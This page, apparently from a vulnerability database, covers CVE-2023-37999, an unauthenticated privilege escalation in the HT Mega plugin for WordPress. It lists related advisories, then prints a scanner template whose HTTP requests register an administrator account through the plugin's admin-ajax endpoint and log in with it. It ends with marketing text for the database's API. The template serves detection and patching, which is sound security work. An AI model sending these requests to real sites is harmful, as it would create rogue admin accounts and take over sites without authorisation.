| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2023-37999 | 30 Jan 202502:17 | – | circl | |
| WordPress plugin HT Mega 安全漏洞 | 17 May 202400:00 | – | cnnvd | |
| CVE-2023-37999 | 17 May 202406:51 | – | cve | |
| CVE-2023-37999 WordPress HT Mega Absolute Addons for Elementor plugin <= 2.2.0 - Unauthenticated Privilege Escalation vulnerability | 17 May 202406:51 | – | cvelist | |
| EUVD-2023-41826 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-37999 | 17 May 202407:15 | – | nvd | |
| CVE-2023-37999 | 17 May 202407:15 | – | osv | |
| WordPress HT Mega Plugin <= 2.2.0 is vulnerable to Privilege Escalation | 14 Jul 202300:00 | – | patchstack | |
| PT-2024-12675 | 17 May 202400:00 | – | ptsecurity | |
| Multiple Flaws Found in Ninja Forms Plugin Leave 800,000 Sites Vulnerable | 31 Jul 202306:42 | – | thn |
id: CVE-2023-37999
info:
name: HT Mega – Absolute Addons for Elementor <= 2.2.0 - Missing Authorization to Privilege Escalation
author: daffainfo
severity: critical
description: |
The HT Mega plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.2.0. This is due to missing validation of the reg_role parameter on the htmega_ajax_register function. This makes it possible for unauthenticated attackers to create administrator accounts.
impact: |
Attackers can escalate privileges, gaining unauthorized access to restricted functionalities or data.
remediation: |
Update to the latest version of HT Mega to address the privilege management issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor/ht-mega-absolute-addons-for-elementor-220-missing-authorization-to-privilege-escalation
- https://plugins.trac.wordpress.org/changeset/2934204/ht-mega-for-elementor/trunk/includes/helper-function.php?contextall=1&old=2899662&old_path=%2Fht-mega-for-elementor%2Ftrunk%2Fincludes%2Fhelper-function.php
- https://patchstack.com/database/vulnerability/ht-mega-for-elementor/wordpress-ht-mega-absolute-addons-for-elementor-plugin-2-2-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2023-37999
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37999
cwe-id: CWE-269
epss-score: 0.03043
epss-percentile: 0.85965
cpe: cpe:2.3:a:hasthemes:ht_mega:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: hasthemes
product: ht_mega
framework: wordpress
publicwww-query: "/wp-content/plugins/ht-mega-for-elementor"
tags: cve,cve2023,wordpress,wp,wp-plugin,hasthemes,ht_mega,vkev,ht-mega-for-elementor
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
reg_name={{username}}®_password={{password}}®_email={{email}}®_role=administrator
matchers:
- type: dsl
dsl:
- 'contains(body,"Successfully Register")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Login
matchers:
- type: dsl
dsl:
- 'contains_all(header,"wordpress_logged_in", "/wp-admin")'
- 'status_code == 302'
condition: and
extractors:
- type: dsl
dsl:
- '"Username: " + username + ". Password: "+ password'
# digest: 4b0a00483046022100e69ba3604d5f5296ea22aaadc1d683b85cede0ab8277c8b82a1ddfd7681221d6022100d121f9e64c967354c4488281c9542ee5560de9047be161046cdf01337ac94a25:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation